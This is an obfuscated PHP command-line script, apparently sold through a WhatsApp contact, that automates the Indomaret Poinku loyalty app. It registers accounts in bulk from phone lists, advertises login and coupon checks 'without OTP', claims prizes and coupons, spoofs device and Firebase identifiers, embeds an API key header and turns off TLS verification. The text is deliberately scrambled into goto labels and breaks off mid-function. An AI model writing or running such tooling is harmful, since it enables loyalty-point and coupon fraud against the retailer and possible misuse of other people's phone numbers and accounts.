  $yy9BI; 
  goto YIYeO; 
  a_dZx: 
  $u35jw = count($m0f8X) - 1; 
  goto eyI9u; 
  X1rFz: 
  echo @zM6iC("yellow", "Berhasil Login"); 
  goto Gqhb0; 
  mYNHG: 
  echo "\xa"; 
  goto aDo3a; 
  ubh_u: 
  echo "
"; 
  goto FytSC; 
  xloGc: 
  $U_EVz = @$owfHy["data"][$dQ8Tp]["subDistrictCode"]; 
  goto jSqDU; 
  h2hMj: 
  echo @zm6iC("red", "[4] {$BeKks} \xa  > {$Uzp_O} 
\xa"); 
  goto ptHr2; 
  veYsp: 
  die; 
  goto FzNDx; 
  X1oV7: 
  echo "\xa"; 
  goto GSEf6; 
  mHEq8: 
  echo "
"; 
  goto kHpsw; 
  X7Wc2: 
  rCf0L: 
  goto h93df; 
  nu_T_: 
  echo @zM6ic("purple", "Status  : "); 
  goto s8LZ0; 
  oVetn: 
  echo @zM6iC("yellow", "Masukkan Nilai Minimum Poin Mu : "); 
  goto mGdhE; 
  PsWgp: 
  $wDisp = "{"fid":"" . $odGGi . "","appId":"1:998816605328:android:" . $aY0el . "","authVersion":"FIS_v2","sdkVersion":"a:17.0.0"}"; 
  goto jSY81; 
  hwyFK: 
  $WYrgv = @$H1g60["fid"]; 
  goto Q8ZOz; 
  ud_I2: 
  echo @zM6iC("purple", "ID    : "); 
  goto w8Oba; 
  buN63: 
  $U0YgX = str_replace("\xd", '', $zcN5u); 
  goto s2Asv; 
  RTtKY: 
  Wa6Sr: 
  goto en_ME; 
  wPlvB: 
  $ofEkP = CwALz("https://edtsapp.indomaretpoinku.com/loyalty/apix-1502-api/mobile/coins/prizes/GOFRESH2022/tokens/claim/single", $wDisp, $aY0el, $GOXkU, $mlMLt); 
  goto WFREJ; 
  HlSVo: 
  echo "\xa"; 
  goto ibp8F; 
  ZDwf_: 
  die; 
  goto ELsW3; 
  EiZOM: 
  echo "
"; 
  goto SVzVu; 
  Qh716: 
  @unlink("poinhp.php"); 
  goto mYNHG; 
  e1JPg: 
  $IKJzx = array(file_get_contents("https://irfan.iproute.my.id/ipoinx/medansi/keram")); 
  goto XZK0M; 
  eTH3i: 
  echo @Zm6IC("yellow", "Kode Kuponnya  : "); 
  goto KXTQE; 
  MpoPp: 
  $upOL9 = G8Pf2("https://edtsapp.indomaretpoinku.com/coupon/apix-1502-api/mobile/coupon-detail/" . $KOeAA, $aY0el, $GOXkU, $mlMLt); 
  goto Nz6rs; 
  Viphl: 
  $L1qpJ = @$owfHy["data"][0]["district"]["district"]; 
  goto m6Vqe; 
  OnVQz: 
  $wlJRC = XOZB4(array("|"), $wZnHP)[1]; 
  goto iOY8b; 
  J_QAU: 
  echo @ZM6Ic("yellow", "Berhasil Login"); 
  goto KPgnh; 
  n9nIa: 
  echo @zm6ic("red", "
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\xa"); 
  goto QdmIB; 
  JoF2q: 
  echo @ZM6Ic("yellow", "Build By FERDY RAMADHAN "); 
  goto XGDc2; 
  WNyMN: 
  echo $jTEU0; 
  goto j3DmD; 
  tJibk: 
  $Jk9cx = G8Pf2("https://edtsapp.indomaretpoinku.com/configuration/apix-1502-api/mobile/sy-app-version/get-version-key/ANDROID", $aY0el, $GOXkU, $mlMLt); 
  goto B9JFh; 
  QtF47: 
  $S8W9D = trim(fgets(STDIN)); 
  goto vj_Vw; 
  aT0HM: 
  $ABmxY = @$cQFRW["data"]["balance"]; 
  goto Ddz2F; 
  JFR6I: 
  echo @zm6IC("nevy", "Sorry, This Script Has Been Removed By The Owner!!"); 
  goto nTV_R; 
  EafIZ: 
  echo @ZM6IC("nevy", $YUfPv); 
  goto rxO0c; 
  fFoJk: 
  echo "
"; 
  goto IY18O; 
  Hl0fv: 
  echo @Zm6ic("green", "Nomor HP Anda : "); 
  goto BFRXN; 
  bim6t: 
  $U0YgX = str_replace("\xd", '', $zcN5u); 
  goto iw_eV; 
  Km1cZ: 
  $fM3_G = "0"; 
  goto qsntQ; 
  ezbM7: 
  @unlink("poinhp.php"); 
  goto s8ivf; 
  EbIaF: 
  function deouL($FK_yc, $bQedf) 
  { 
    goto R5nVg; 
    t5q6F: 
    fclose($FhLCi); 
    goto B2DUC; 
    OkO6g: 
    fputs($FhLCi, "{$bQedf}
"); 
    goto t5q6F; 
    R5nVg: 
    $FhLCi = fopen($FK_yc, "a"); 
    goto OkO6g; 
    B2DUC: 
  } 
  goto bBsji; 
  CiT9u: 
  $wlJRC = xOZb4(array("|"), $wZnHP)[1]; 
  goto rBkbA; 
  fyrrg: 
  $Jk9cx = G8PF2("https://edtsapp.indomaretpoinku.com/configuration/apix-1502-api/mobile/sy-app-version/get-version-key/ANDROID", $aY0el, $GOXkU, $mlMLt); 
  goto hNtE9; 
  ZVAC_: 
  $QRhbE = explode("\xa", @file_get_contents("forceclose")); 
  goto U7gXf; 
  qNkJO: 
  echo "
"; 
  goto XnfNW; 
  Fe5Ht: 
  echo "\xa"; 
  goto q9myf; 
  dYDYD: 
  $Ap1KM = json_decode($xT15V, true); 
  goto QKOt8; 
  AMMpd: 
  $u35jw = count($m0f8X) - 1; 
  goto IgsmW; 
  DjtjH: 
  print_r($zcN5u); 
  goto pRlaN; 
  ODdXV: 
  $JrTpE = @$owfHy["data"][$dQ8Tp]["city"]; 
  goto DWoKo; 
  HB4hn: 
  k0XKX: 
  goto B_JBr; 
  ZezGD: 
  skjRn: 
  goto N2CUG; 
  zVEB0: 
  echo "\xa"; 
  goto J4xhG; 
  xgzIC: 
  die; 
  goto OA0KP; 
  uqWGX: 
  if (!($jTEU0 < $S8W9D)) { 
    goto ms9L8; 
  } 
  goto EY27O; 
  dnr_q: 
  function zM6ic($lwjTx = "default", $KEYNT) 
  { 
    $bfa3s = array("red" => "1;31", "green" => "1;32", "yellow" => "1;33", "blue" => "1;34", "nevy" => "1;36", "purple" => "1;35"); 
    return "\33[" . $bfa3s[$lwjTx] . "m" . $KEYNT . "\x1b[0m"; 
  } 
  goto uPmaS; 
  gW2bG: 
  echo ">"; 
  goto QSo8z; 
  MJWb1: 
  $yy9BI = "0"; 
  goto PltW2; 
  Mosdc: 
  bCLi4: 
  goto cvmiq; 
  qifxP: 
  echo @zM6ic("yellow", "Nama District : "); 
  goto cQZFg; 
  ECJVT: 
  Tr9Br: 
  goto nX6v1; 
  fUkb9: 
  echo @ZM6ic("yellow", "Status : "); 
  goto s0Zx8; 
  l5RJI: 
  if ($RJnNP == "y") { 
    goto xjSqb; 
  } 
  goto i9qNy; 
  WUeTg: 
  die; 
  goto wkpJu; 
  M0pcn: 
  if (!($Pud0o == "true")) { 
    goto zP__f; 
  } 
  goto muUMy; 
  oZ7zX: 
  $wDisp = ''; 
  goto SXlr7; 
  hBtwy: 
  $ZdrCv = rand(10, 99); 
  goto ePkw1; 
  gSIFK: 
  $xzAuu = @$owfHy["data"][$qtgR3]["value"]; 
  goto Zi6MS; 
  O2W6_: 
  if (password_verify($Gukt8, $Jst1j)) { 
    goto UWLRz; 
  } 
  goto EZ2g0; 
  vg11_: 
  echo "
"; 
  goto LW72A; 
  tMEM6: 
  $yI7qh = tHHFS("https://edtsapp.indomaretpoinku.com/login/apix-1502-api/open/login-sms", $wDisp, $aY0el, $GOXkU); 
  goto AUohZ; 
  f1yJ5: 
  if (!($fUekS == '')) { 
    goto P2g53; 
  } 
  goto VwnFr; 
  cZqL8: 
  $zvt88 = $QRhbE; 
  goto qi7k2; 
  qBrWX: 
  echo @ZM6iC("yellow", "Nama Provinsi : "); 
  goto MAExu; 
  eulTp: 
  goto kmnPA; 
  goto G6Vck; 
  cVyx2: 
  echo @ZM6ic("nevy", $yJiD4); 
  goto trl7f; 
  r2f9G: 
  echo @ZM6IC("green", $wd9cN); 
  goto X5Mni; 
  qPamN: 
  echo @zM6ic("green", "Balance Stamp : "); 
  goto uG5i5; 
  EIB0l: 
  $M1ADy = @$Ap1KM["data"]["id"]; 
  goto THkHS; 
  GJQG1: 
  goto eM0mo; 
  goto bpESN; 
  yDufB: 
  $rVPVc = @file_get_contents("sigeo takeda"); 
  goto U5zus; 
  X5CYR: 
  $M1ADy = @$Ap1KM["data"]["id"]; 
  goto hikDr; 
  Smrqq: 
  $zvt88 = $QRhbE; 
  goto DkiWA; 
  vpl0C: 
  echo @zM6Ic("yellow", "Pesan       : "); 
  goto bdqBC; 
  pRwIq: 
  if (!($zcN5u == '')) { 
    goto n5UbT; 
  } 
  goto UKi12; 
  BvCfg: 
  $m5BZY = GGgR_("https://asia-southeast2-idm-corp-prd.cloudfunctions.net/idmapps_tracker_gateway", $wDisp); 
  goto QFsa0; 
  UB3bx: 
  function iFWUA($lEbop, $wDisp = null) 
  { 
    goto Th57f; 
    URVew: 
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "klik.txt"); 
    goto q8ADe; 
    ficQM: 
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto dp6Y0; 
    qadro: 
    $ruc3h[] = "Connection: Keep-Alive"; 
    goto bkyu7; 
    dp6Y0: 
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto taUZi; 
    taUZi: 
    goto FYZCZ; 
    goto X06Xh; 
    PamBK: 
    curl_setopt($C6npe, CURLOPT_POST, 1); 
    goto OHrVi; 
    QeFPe: 
    $P7lm9 = curl_getinfo($C6npe); 
    goto vCfxp; 
    Kh9UG: 
    return $ECuqv; 
    goto HSQBn; 
    U1TGr: 
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true); 
    goto wo4h8; 
    q8ADe: 
    $ECuqv = curl_exec($C6npe); 
    goto QeFPe; 
    pY7az: 
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1); 
    goto PamBK; 
    X06Xh: 
    Z1QoE: 
    goto Q__7u; 
    kiqAk: 
    curl_setopt($C6npe, CURLOPT_URL, $lEbop); 
    goto Xxzzp; 
    vCfxp: 
    if (!$P7lm9) { 
      goto Z1QoE; 
    } 
    goto ficQM; 
    c1cLq: 
    curl_setopt($C6npe, CURLOPT_POSTFIELDS, $wDisp); 
    goto haMCc; 
    ED12j: 
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0); 
    goto c1cLq; 
    mBJan: 
    print_r($AXlcQ); 
    goto Kh9UG; 
    Q__7u: 
    return false; 
    goto lXi_I; 
    OHrVi: 
    $ruc3h[] = "User-Agent: okhttp/5.0.0-alpha.5"; 
    goto qadro; 
    lXi_I: 
    FYZCZ: 
    goto Ojqp6; 
    Xxzzp: 
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true); 
    goto pY7az; 
    Ojqp6: 
    $AXlcQ = json_decode($y7f11, true); 
    goto mBJan; 
    wo4h8: 
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h); 
    goto ED12j; 
    haMCc: 
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "klik.txt"); 
    goto URVew; 
    Th57f: 
    $C6npe = curl_init(); 
    goto kiqAk; 
    bkyu7: 
    $ruc3h[] = "Content-Type: application/json"; 
    goto U1TGr; 
    HSQBn: 
  } 
  goto fa7Dr; 
  ezYSj: 
  @unlink("beat"); 
  goto DYYUw; 
  HENgQ: 
  $owfHy = json_decode($upOL9, true); 
  goto mMLTN; 
  gSTn8: 
  if ($XDyMm == "1") { 
    goto vFJdm; 
  } 
  goto SFraX; 
  LE6IR: 
  $odGGi = $kCT0W . "mbLQpe"; 
  goto ySmQ3; 
  lQPJW: 
  @unlink("poinhp.php"); 
  goto nTwzh; 
  rwvRX: 
  echo "Deleted {$xp_1p} "; 
  goto QFCAG; 
  KSHR0: 
  echo "\xa"; 
  goto uW7cX; 
  K3Pk1: 
  if ($RJnNP == "y") { 
    goto Cu90i; 
  } 
  goto zPNPk; 
  e2U0W: 
  $jTEU0++; 
  goto ge0DY; 
  NsEvq: 
  if ($DNueE == "y") { 
    goto ZlzNN; 
  } 
  goto AHUHW; 
  LVZDm: 
  curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h); 
  goto HGduE; 
  LAc1I: 
  $Ap1KM = json_decode($Jk9cx, true); 
  goto HWxH4; 
  lstXN: 
  echo @Zm6ic("nevy", " | Script IDM LOGIN POINKU CEK KUPON TANPA OTP
"); 
  goto z_df6; 
  RaRdi: 
  echo "\xa
"; 
  goto twwF0; 
  f3MfN: 
  $Jk9cx = g8Pf2("https://edtsapp.indomaretpoinku.com/configuration/apix-1502-api/mobile/ms-homepage-layout/get-all-homepage-layout", $aY0el, $GOXkU, $mlMLt); 
  goto j1jXq; 
  u2o7b: 
  echo @Zm6ic("yellow", "Nama Stamp   : "); 
  goto Xn1A1; 
  XsrmP: 
  echo "\xa"; 
  goto NreZy; 
  H36MT: 
  vCPy3: 
  goto FpdUn; 
  lF8em: 
  $wZnHP = $lPULW[$jTEU0]; 
  goto YhnL7; 
  bp5Ld: 
  echo "\xa\xa"; 
  goto Q40cO; 
  Syt7J: 
  $owfHy = json_decode($XTuz1, true); 
  goto KSKKG; 
  Rokos: 
  $jTEU0++; 
  goto JBC35; 
  LatCK: 
  $QRhbE = explode("\xa", @file_get_contents("forceclose")); 
  goto UMXEW; 
  DaBwG: 
  RM7sw: 
  goto aKLgU; 
  iDAIJ: 
  $yy9BI++; 
  goto dZum6; 
  BuX7K: 
  $earOL = $sONlZ; 
  goto betTY; 
  d1cn3: 
  dVFa2: 
  goto beAQe; 
  E28sd: 
  $gYG6P = rand(1000, 9999); 
  goto sx31h; 
  xMSWM: 
  $YE0oY = G1wXt("https://edtsapp.indomaretpoinku.com/login/apix-1502-api/open/pin/check-device", $wDisp, $aY0el, $GOXkU, $mlMLt); 
  goto N62sd; 
  yGUlS: 
  $qeP83 = str_replace("
", '', $vzRG5); 
  goto ptjzv; 
  c0aES: 
  DPq0p: 
  goto LhXhn; 
  Z8K7v: 
  $Jk9cx = G8pF2("https://edtsapp.indomaretpoinku.com/loyalty/apix-1502-api/mobile/reminders/me", $aY0el, $GOXkU, $mlMLt); 
  goto u06Ti; 
  eHSlO: 
  echo "
"; 
  goto g12c3; 
  obQ7N: 
  $GiPr2 = trim(fgets(STDIN)); 
  goto RYVIS; 
  n0BPz: 
  echo "\xa"; 
  goto QYNTd; 
  y7067: 
  $QRhbE = explode("
", @file_get_contents("GRATIS Indomie Mi Goreng!.txt")); 
  goto CPIBf; 
  lNcIn: 
  b3wIQ: 
  goto hm9FI; 
  gGCoG: 
  $RJnNP = trim(fgets(STDIN)); 
  goto IVMnN; 
  NaHpn: 
  $xT15V = g8pf2("https://edtsapp.indomaretpoinku.com/%2Floyalty%2Fapix-1502-api%2Fmobile%2Fcoins%2Fprizes%2FGOFRESH2022%2Fme", $aY0el, $GOXkU, $mlMLt); 
  goto gNfSU; 
  qU51_: 
  g2xJ9: 
  goto qBoxd; 
  sPy1z: 
  hFpxB: 
  goto seTDF; 
  j7f8L: 
  $PQA77 = $OtngW; 
  goto B9LnM; 
  IQ9ZU: 
  $qtgR3++; 
  goto mHVo8; 
  wLOWl: 
  $WtCiL = @$Ap1KM["data"]["couponCode"]; 
  goto I1BAb; 
  iFBZv: 
  echo @zm6IC("nevy", "Sorry, This Script Has Been Removed By The Owner!!"); 
  goto szDyD; 
  VMIc9: 
  echo "
"; 
  goto eFo7K; 
  i8Wxa: 
  echo @ZM6ic("nevy", $ZNU2M); 
  goto QQ1jd; 
  sBKLJ: 
  $Uzp_O = @$lImQC["data"]["content"][4]["couponCode"]; 
  goto i4D_W; 
  STwv9: 
  echo "
"; 
  goto jfh1u; 
  lWEpz: 
  echo @Zm6IC("nevy", $D18xv); 
  goto BybP1; 
  GFsfA: 
  if (!($fUekS == '')) { 
    goto B_12r; 
  } 
  goto Wlwm2; 
  cc9fY: 
  echo "Mulai Baris Ke : "; 
  goto hpqJl; 
  Ym8cq: 
  $wDisp = ''; 
  goto YRlTm; 
  prGIN: 
  $Z3FW0 = date("Y-m-d", $Jzh8Y); 
  goto Ret60; 
  A1QGS: 
  goto wlhXO; 
  goto xaeG2; 
  CCFBe: 
  echo "\xa"; 
  goto PnS2d; 
  J7tr_: 
  $sONlZ = str_replace("\xd", '', $rERzL); 
  goto BuX7K; 
  ld8w2: 
  $jTEU0 = trim(fgets(STDIN)); 
  goto Hmjxw; 
  naftu: 
  $w5ulg = str_replace("
", '', $TvVlh); 
  goto DgaoM; 
  bssg1: 
  goto Gq4tD; 
  goto z7JlD; 
  sIhrS: 
  die; 
  goto c8qjb; 
  VnEev: 
  $earOL = $sONlZ; 
  goto TNLsq; 
  K8pWO: 
  q3ueI: 
  goto Kmr8y; 
  THW2n: 
  hEEWG: 
  goto dZtlv; 
  asbF8: 
  echo @zM6Ic("nevy", "\xa~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"); 
  goto mqK52; 
  VPytH: 
  die; 
  goto sIhrS; 
  ZNTQI: 
  $M1ADy = @$Ap1KM["data"]["id"]; 
  goto wvA9a; 
  Huujv: 
  echo @ZM6ic("nevy", "[6] {$kbWoT} \xa  > {$WvHe1} 

"); 
  goto YSM2f; 
  s2YHg: 
  $obc_G = str_replace("\xd", '', $wlJRC); 
  goto rSmA9; 
  kytly: 
  echo @zM6iC("yellow", " - Silahkan Melakukan Transaksi Terlebih Dahulu\xa"); 
  goto spPk5; 
  IbN8j: 
  $Jk9cx = G8Pf2("https://edtsapp.indomaretpoinku.com/customer/apix-1502-api/mobile/detail-customer-origin", $aY0el, $GOXkU, $mlMLt); 
  goto VpqjY; 
  IaTZ8: 
  echo @ZM6iC("yellow", "| WA 082176358295 \xa"); 
  goto ZbpF6; 
  pNRYy: 
  echo @ZM6Ic("green", "Mau Tukar Produk Mana ? : "); 
  goto zF0W4; 
  zeNT9: 
  echo "\xa"; 
  goto MSy9W; 
  DPkPt: 
  $m0f8X = explode("
", @file_get_contents("mytoken")); 
  goto Z71kR; 
  rIUhZ: 
  goto h8G8Y; 
  goto Ndfha; 
  Arsu5: 
  echo $BcbF3; 
  goto mHEq8; 
  NSiv6: 
  echo @zm6IC("yellow", " 16 . Pecah Kado / BIJI \xa"); 
  goto mNOkA; 
  p6p07: 
  $hwqq9 = tHHFS("https://edtsapp.indomaretpoinku.com/login/apix-1502-api/open/pin/check-device", $wDisp, $aY0el, $GOXkU); 
  goto m6Ofd; 
  syyzu: 
  $Y02JS = G1wXT("https://edtsapp.indomaretpoinku.com/login/apix-1502-api/pin/create-pin", $wDisp, $aY0el, $GOXkU, $mlMLt); 
  goto zn1MU; 
  nwHwx: 
  $Ap1KM = json_decode($Jk9cx, true); 
  goto ZQW9J; 
  EDut1: 
  if (!($cPDPt == 5)) { 
    goto m4_o3; 
  } 
  goto gyLDE; 
  Tb15R: 
  LA_80: 
  goto uUFQx; 
  JJg2J: 
  $zcN5u = Xozb4(array("
"), $tqWr2)[$Tvjlw]; 
  goto m1w6_; 
  dJ2RH: 
  $Jst1j = $aoIfK; 
  goto ohdy7; 
  nlQXj: 
  RHRIj("Kupon Poinku new.txt", $e52KH); 
  goto iT6C0; 
  F6EGi: 
  $nb9cm = round(microtime(true) * 1000); 
  goto OwvXv; 
  N9Kna: 
  $ABmxY = @$nPb0z["message"]; 
  goto L3UDg; 
  D0LEk: 
  echo "
"; 
  goto oAz6K; 
  XRDCd: 
  $efQM2 = count($QRhbE) - 1; 
  goto erWnH; 
  EN8OP: 
  echo @ZM6IC("yellow", " 1 . Regist Poinku + Pecahin\xa"); 
  goto j9DK2; 
  mDkhk: 
  echo @zM6iC("nevy", $ZNU2M); 
  goto hesKw; 
  jaJV2: 
  fZnQ2: 
  goto pJUW3; 
  IRvmv: 
  die; 
  goto K8pWO; 
  N_D3L: 
  pmlrN: 
  goto Rokos; 
  J8NDx: 
  goto MxwyD; 
  goto KCcRM; 
  YMWoX: 
  die; 
  goto WZD8e; 
  PMZGw: 
  $yy9BI = "0"; 
  goto OSZHw; 
  fpw_v: 
  echo "Mulai Baris Ke : "; 
  goto trai8; 
  xoWJi: 
  echo "
"; 
  goto pQDNX; 
  JO9PJ: 
  echo @Zm6iC("yellow", "Status Pecahin Ayam : "); 
  goto ahQhu; 
  K3NB6: 
  Cu90i: 
  goto iaYFB; 
  Vqsgq: 
  echo "\xa"; 
  goto wUb6J; 
  xMmo2: 
  $dQ8Tp = trim(fgets(STDIN)); 
  goto Om5sv; 
  XuMwA: 
  $owfHy = json_decode($upOL9, true); 
  goto KBulf; 
  jveCL: 
  echo @Zm6iC("nevy", "Sorry, This Script Has Been Removed By The Owner!!"); 
  goto BObVG; 
  fOkfz: 
  $qtgR3 = "0"; 
  goto DZWQy; 
  xfpgA: 
  echo "
"; 
  goto TbEJQ; 
  rU5Ul: 
  $earOL = $sONlZ; 
  goto vNWQ0; 
  IpDdv: 
  echo @Zm6IC("yellow", "Pesan       : "); 
  goto OWHjB; 
  qp4VT: 
  echo @zm6IC("nevy", " | TAMBAH ALAMAT\xa"); 
  goto PInYa; 
  EBBgy: 
  $Jk9cx = E6TPN("https://firebase-settings.crashlytics.com/spi/v2/platforms/android/gmp/1:998816605328:android:" . $aY0el . "/settings?instance=a291cbe808f666683ac167ea58393c709528e4f6&build_version=104&display_version=3.13.0&source=4", $aY0el); 
  goto itd9E; 
  zX3Pb: 
  $zcN5u = xoZb4(array("|"), $wZnHP)[0]; 
  goto cIVmT; 
  zA4ox: 
  echo "
"; 
  goto O6JNu; 
  x7MT3: 
  echo "
"; 
  goto M6fNa; 
  h8I8b: 
  echo $BcbF3; 
  goto XsrmP; 
  ngE2Z: 
  echo "\xa"; 
  goto d93tp; 
  U_2QW: 
  $yeprB = G1Wxt("https://edtsapp.indomaretpoinku.com/notification/apix-1502-api/push-notifications/fcm-registration", $wDisp, $aY0el, $GOXkU, $mlMLt); 
  goto hrBYg; 
  oCGJ7: 
  echo @ZM6IC("yellow", "Pesan : "); 
  goto zpxt2; 
  q6e41: 
  echo @ZM6iC("nevy", $p4iky); 
  goto gVY9A; 
  lU578: 
  echo @zm6iC("yellow", "Pesan : "); 
  goto ZZHp1; 
  dTZdO: 
  $Ap1KM = json_decode($Jk9cx, true); 
  goto m5XjT; 
  hoCcO: 
  @unlink("poinhp.php"); 
  goto Sszbg; 
  gavpL: 
  echo @ZM6IC("nevy", " Silahkan Hubungi Creator Untuk Verifikasi https://wa.me/6282176358295

"); 
  goto ezYSj; 
  zeVAA: 
  bjdV_: 
  goto sJbH0; 
  TmNrv: 
  echo "\xa"; 
  goto H_1h5; 
  Akd3I: 
  echo "\xa"; 
  goto nmqsG; 
  mIJkZ: 
  echo @zm6ic("yellow", "| WA 082176358295 
"); 
  goto nL9dQ; 
  oAz6K: 
  echo "\xa"; 
  goto zFVeV; 
  VQBza: 
  if ($uU2QF == "Diskon Rp 25.000 Klik Indomaret") { 
    goto PLb2v; 
  } 
  goto LCTSc; 
  Ca_8z: 
  $GOXkU = $w5ulg; 
  goto w5vjT; 
  cFW3Z: 
  $jTEU0; 
  goto H1hXk; 
  rouo1: 
  $efQM2 = count($IKJzx) - 1; 
  goto saptm; 
  uo5Zq: 
  ms9L8: 
  goto aVRdS; 
  FHkRx: 
  echo "\xa"; 
  goto vsZvq; 
  gbJig: 
  if (!($XDyMm == "0")) { 
    goto Y06Dy; 
  } 
  goto mx2GA; 
  FR1AZ: 
  echo "Error deleting {$xp_1p} "; 
  goto D1mj_; 
  TQVo8: 
  echo "
"; 
  goto Z0dwt; 
  lyjUC: 
  $m5BZY = GGGr_("https://asia-southeast2-idm-corp-prd.cloudfunctions.net/idmapps_tracker_gateway", $wDisp); 
  goto j6M7L; 
  twwF0: 
  echo @zM6IC("red", "NOTICE !! : \xa"); 
  goto kytly; 
  uSYHL: 
  $Ap1KM = json_decode($Jk9cx, true); 
  goto VPvQq; 
  rxDSC: 
  echo @ZM6IC("red", "
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\xa"); 
  goto mHrTZ; 
  vmL3U: 
  echo "
"; 
  goto mSn2N; 
  qducy: 
  $lPULW = $m0f8X; 
  goto lF8em; 
  CnoX2: 
  die; 
  goto ZsgDH; 
  F0l4Y: 
  $jTEU0; 
  goto l1E44; 
  V9uWz: 
  $wDisp = "{"appInstanceId":"" . $WYrgv . "","appVersion":"3.13.0","countryCode":"ID","analyticsUserProperties":{},"appId":"1:998816605328:android:" . $aY0el . "","platformVersion":"28","timeZone":"Asia\/Jakarta","sdkVersion":"21.0.1","packageName":"mypoin.indomaret.android","appInstanceIdToken":"" . $YYbml . "","languageCode":"id-ID","appBuild":"104"}"; 
  goto zs8V0; 
  wZPE1: 
  goto hEEWG; 
  goto er8dK; 
  OE4L_: 
  die; 
  goto Aa3T3; 
  TNk5I: 
  GuZf2: 
  goto rjtX2; 
  HJBvX: 
  die; 
  goto gWmQc; 
  LhKCM: 
  echo @Zm6iC("yellow", "Notice : Ini Hanya Untuk Pancingan AWAL Harap Pilih 1 Nomor Aja.. 
\xa"); 
  goto TMRV6; 
  waCGA: 
  @unlink("poinhp.php"); 
  goto k14Mn; 
  adOVg: 
  $PQD51 = thhFs("https://edtsapp.indomaretpoinku.com/login/apix-1502-api/open/pin/is-pin-exist-by-phone-number", $wDisp, $aY0el, $GOXkU); 
  goto CBPly; 
  nmVJN: 
  echo @Zm6iC("yellow", "Nama Kota    : "); 
  goto cVyx2; 
  Cnge9: 
  echo @ZM6Ic("yellow", "Status Pecahin Ayam : "); 
  goto xZqqd; 
  beAQe: 
  echo $yy9BI . ". "; 
  goto eGQqo; 
  VajPX: 
  $wDisp = "{"phoneNumber":"" . $zn5zd . "","otp":"" . $hdCXp . "","deviceId":"" . $aY0el . ""}"; 
  goto Hw18y; 
  uk6Jf: 
  echo @zm6IC("yellow", "Register + Set Pin OTOMATIS\xa"); 
  goto IjaTJ; 
  h6Wa9: 
  if (!($qtgR3 < $CdOss)) { 
    goto jwQwr; 
  } 
  goto CDtUL; 
  NYZyT: 
  E34nz: 
  goto xxJd7; 
  X66Js: 
  echo "\xa"; 
  goto cSFfS; 
  fUT4R: 
  FB07L: 
  goto m4yCF; 
  E9X9M: 
  echo @zM6iC("nevy", $ABmxY); 
  goto RzArZ; 
  d93tp: 
  echo @Zm6IC("nevy", "Sorry, This Script Has Been Removed By The Owner!!"); 
  goto OIAkv; 
  tLljN: 
  SyMwb: 
  goto Tb15R; 
  ua_0C: 
  $wDisp = "{"data":[{"application":{"app_version":"3.13.0","device_class":"Phone","device_family":"" . $GOXkU . "","device_id":"" . $aY0el . "","os_name":"Android P","os_version":"Android 9"},"core":{"event_name":"page_view","event_timestamp":" . $nb9cm . ","page_name":"splash","page_urlpath":""},"user":{"session_id":"" . $MXjqh . "","user_ip_address":"127.0.0.1"}}]}"; 
  goto yBav_; 
  fDalJ: 
  $XTuz1 = g1Wxt("https://edtsapp.indomaretpoinku.com/customer/apix-1502-api/mobile/customer-address/sub-district", $wDisp, $aY0el, $GOXkU, $mlMLt); 
  goto zddGh; 
  CkDZ0: 
  goto irVGF; 
  goto Iv2S8; 
  WZiQo: 
  echo "\xa"; 
  goto qBrWX; 
  P8zZ3: 
  $Jk9cx = G8Pf2("https://edtsapp.indomaretpoinku.com/customer/apix-1502-api/mobile/get-data-customer", $aY0el, $GOXkU, $mlMLt); 
  goto GGHhV; 
  ibrrS: 
  M20ZQ("your", $aoIfK); 
  goto oBJ1a; 
  nAcOm: 
  if (!($fUekS == '')) { 
    goto smSBj; 
  } 
  goto HFyvl; 
  fxsrP: 
  echo @zm6IC("yellow", " 11 . Bikin Barcode Mie\xa"); 
  goto SVWfL; 
  qpb4_: 
  function HonAE($lEbop, $wDisp = null, $aY0el, $GOXkU) 
  { 
    goto yr0rW; 
    CnQG1: 
    $P7lm9 = curl_getinfo($C6npe); 
    goto wVWpD; 
    DTf3D: 
    $ruc3h[] = "accept-encoding: gzip"; 
    goto RsEQr; 
    Nnnau: 
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1); 
    goto q041t; 
    RsEQr: 
    $ruc3h[] = "Host: edtsapp.indomaretpoinku.com"; 
    goto Od0rk; 
    jpxDs: 
    goto Wjv2c; 
    goto misIC; 
    pydWi: 
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "indo.txt"); 
    goto P4HbP; 
    yr0rW: 
    $C6npe = curl_init(); 
    goto zp5_w; 
    FkLdv: 
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true); 
    goto g3tvD; 
    OM7bT: 
    $AXlcQ = json_decode($y7f11, true); 
    goto zTP2H; 
    Od0rk: 
    $ruc3h[] = "content-type: application/json; charset=UTF-8"; 
    goto Urv14; 
    q041t: 
    curl_setopt($C6npe, CURLOPT_POST, 1); 
    goto n_96m; 
    Urv14: 
    $ruc3h[] = "key: ZWR0czIwMjE6MHBsbW9rbg=="; 
    goto aI6Ze; 
    misIC: 
    U6cgD: 
    goto VUb1t; 
    VUb1t: 
    return false; 
    goto CxRKI; 
    tS6k9: 
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0); 
    goto K1k2q; 
    PJL0a: 
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto TvLG5; 
    aI6Ze: 
    $ruc3h[] = "{"app_version":"3.13.0","device_class":"Phone","device_family":"" . $GOXkU . "","device_id":"" . $aY0el . "","os_name":"Android P","os_version":"Android 9"}"; 
    goto FkLdv; 
    n_96m: 
    $ruc3h[] = "user-agent: okhttp/4.9.0"; 
    goto DTf3D; 
    zp5_w: 
    curl_setopt($C6npe, CURLOPT_URL, $lEbop); 
    goto FrKhl; 
    zTP2H: 
